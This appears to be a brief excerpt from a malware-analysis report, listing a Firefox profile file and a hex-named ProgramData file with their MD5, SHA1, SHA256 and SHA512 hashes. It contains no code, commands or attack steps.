C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\prefs-1.js

MD5 3164eac1799c58364a773c6f346dd59a
SHA1 db6580fff234ad86eb134fe60443b329b6bff766
SHA256 259185460ee226000fa274f22d108bbdf906dc182d936ed5870e86b85e5fece0
SHA512 8d8870c176675cd5d0afc61cadc7f6615b44f190752bb296a70317a7d65e59b3cf9d703b5ff66077b717f54f38af5cc885377d78c08f9a8b3d65fbedd1113185

C:\ProgramData\72B093CA62FBDFDF.dat

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558